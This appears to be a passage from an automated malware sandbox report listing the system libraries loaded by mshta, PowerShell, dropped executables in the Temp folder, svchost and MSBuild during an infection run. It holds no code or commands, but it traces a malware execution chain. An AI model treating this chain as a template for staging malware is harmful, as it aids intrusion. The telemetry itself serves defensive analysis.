Source: C:\Windows\System32\mshta.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: dataexchange.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: d3d11.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: dcomp.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: twinapi.appcore.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: msls31.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: d2d1.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: dwrite.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE Section loaded: mstask.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE Section loaded: dui70.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE Section loaded: duser.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE Section loaded: chartv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE Section loaded: oleacc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE Section loaded: atlthunk.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE Section loaded: winsta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE Section loaded: windows.fileexplorer.common.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE Section loaded: explorerframe.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe Section loaded: qmgr.dll
Source: C:\Windows\System32\svchost.exe Section loaded: bitsperf.dll
Source: C:\Windows\System32\svchost.exe Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe Section loaded: firewallapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: esent.dll
Source: C:\Windows\System32\svchost.exe Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: fwbase.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe Section loaded: bitsigd.dll
Source: C:\Windows\System32\svchost.exe Section loaded: upnp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ssdpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\svchost.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wsmauto.dll
Source: C:\Windows\System32\svchost.exe Section loaded: miutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wsmsvc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dsrole.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pcwum.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wkscli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msv1_0.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exe Section loaded: webio.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe Section loaded: rmclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: usermgrcli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: execmodelclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: propsys.dll
Source: C:\Windows\System32\svchost.exe Section loaded: coremessaging.dll
Source: C:\Windows\System32\svchost.exe Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\svchost.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\svchost.exe Section loaded: execmodelproxy.dll
Source: C:\Windows\System32\svchost.exe Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: vssapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: vsstrace.dll
Source: C:\Windows\System32\svchost.exe Section loaded: samcli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: samlib.dll
Source: C:\Windows\System32\svchost.exe Section loaded: es.dll
Source: C:\Windows\System32\svchost.exe Section loaded: bitsproxy.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: schannel.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mpr.dll
Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe Section loaded: moshost.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mapsbtsvc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mosstorage.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ztrace_maps.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ztrace_maps.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ztrace_maps.dll
Source: C:\Windows\System32\svchost.exe Section loaded: bcp47langs.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mapconfiguration.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\svchost.exe Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe Section loaded: aphostservice.dll
Source: C:\Windows\System32\svchost.exe Section loaded: networkhelper.dll
Source: C:\Windows\System32\svchost.exe Section loaded: userdataplatformhelperutil.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mccspal.dll
Source: C:\Windows\System32\svchost.exe Section loaded: syncutil.dll
Source: C:\Windows\System32\svchost.exe Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: syncutil.dll
Source: C:\Windows\System32\svchost.exe Section loaded: vaultcli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dmcfgutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dmcmnutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dmxmlhelputils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe Section loaded: inproclogger.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exe Section loaded: windows.networking.connectivity.dll
Source: C:\Windows\System32\svchost.exe Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msv1_0.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exe Section loaded: synccontroller.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pimstore.dll
Source: C:\Windows\System32\svchost.exe Section loaded: aphostclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: accountaccessor.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dsclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe Section loaded: systemeventsbrokerclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: userdatalanguageutil.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mccsengineshared.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cemapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: userdatatypehelperutil.dll
Source: C:\Windows\System32\svchost.exe Section loaded: phoneutil.dll
Source: C:\Windows\System32\svchost.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\svchost.exe Section loaded: execmodelproxy.dll
Source: C:\Windows\System32\svchost.exe Section loaded: rmclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe Section loaded: storsvc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: devobj.dll
Source: C:\Windows\System32\svchost.exe Section loaded: fltlib.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe Section loaded: bcd.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wer.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cabinet.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\svchost.exe Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: storageusage.dll
Source: C:\Windows\System32\svchost.exe Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: webio.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: rasadhlp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: schannel.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ntasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ncrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: msasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: gpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: dpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: wbemcomn.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: amsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ondemandconnroutehelper.dll
